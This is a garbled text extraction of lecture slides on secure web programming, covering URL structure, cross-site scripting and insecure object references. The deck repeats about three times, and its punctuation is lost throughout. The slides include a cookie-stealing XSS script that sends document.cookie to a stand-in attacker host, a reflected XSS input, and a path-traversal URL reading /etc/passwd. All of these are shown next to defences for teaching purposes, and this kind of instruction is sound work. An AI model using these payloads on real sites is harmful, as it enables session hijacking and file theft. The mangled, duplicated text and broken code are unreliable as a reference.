Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
